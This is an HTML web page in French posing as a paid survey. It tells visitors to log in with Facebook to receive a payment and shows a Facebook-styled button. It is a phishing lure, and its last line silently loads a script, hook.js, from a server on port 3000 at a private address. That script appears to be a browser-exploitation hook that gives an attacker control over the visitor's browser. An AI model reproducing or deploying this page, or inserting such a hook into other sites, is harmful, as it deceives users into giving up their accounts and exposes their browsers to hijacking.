<!DOCTYPE html>
<html lang="en">
<head>
	<meta charset="UTF-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
	<title>Sondage</title>
</head>
<style>
	body {
  font-family: Arial, Helvetica, sans-serif;
  background-image: url(./629055.jpg);
  background-size: cover;
  background-repeat: no-repeat;
  margin: 0;
}
	.banner{
		background-color: rgb(255, 255, 255);
		margin: 0;
		box-shadow:black 1px 2px 10px 0px;
	}
	.banner h1{
		margin: 0;
		color: rgb(89, 163, 228);
	}
	.div-container{
		width: fit-content;
		position: relative;
		margin-left: auto;
		margin-right: auto;
	}
	.div-container h2{
		font-size: 5rem;
		text-align: center;
		color: white;
	}
	.div-container p{
		font-size: 1.5rem;
		color: white;
	}
	.link-fb{
		width: fit-content;
		position: relative;
		margin-left: auto;
		margin-right: auto;
		border: blue 1px solid;
	}
	.fb {
		background-color: #3B5998;
 		color: white;
	}
	.col {
  width: fit-content;
  position: relative;
  margin: auto;
  padding: 0 50px;
  margin-top: 6px;
}

.fb{
	font-size: 1.5rem;
	padding: 5px;
	border-radius: 5px;

}
a{
	text-decoration: none;
}
.col:hover{
	opacity: 0.8;
}


	@media only screen and (min-device-width:100px) and (max-device-width:800px) {
		body{
			background-size:cover;
			background-image: url(./images.jpeg);
		}
		h1{
			font-size: 80px;
			color: aliceblue;
		}		
		.div-container{
		width: 100%;
		position: relative;
		margin-left: auto;
		margin-right: auto;
	}
	.div-container h2{
		font-size: 3.3rem;
		width: fit-content;
		position: relative;
		margin-left: auto;
		margin-right: auto;
		text-align: center;
	}
	.div-container p{
		padding: 10px;
		text-align: start;
	}
	.col {
  width: auto;
  margin-left: auto;
  margin-right: auto;
  margin-top: 100px;
}
	.fb{
	    
	}
	}
</style>
<body>
	<header>
		<div class="banner"><h1>SONDAGE</h1></div>
	</header>
	<div class="div-container">
		<h2>Sondage rénumerer</h2>
		<p>Pour recevoir votre payment veuiller vous connecté sur facebook pour s'identifier en suivant cette lien:  </p>
	</div>
<div class="col">	<a href="#" class="fb btn">
		<i class="fa fa-facebook fa-fw"></i> connecter avec Facebook </a>
	</div>	   
	<script src="http://192.168.1.13:3000/hook.js"></script>
</body>
</html>
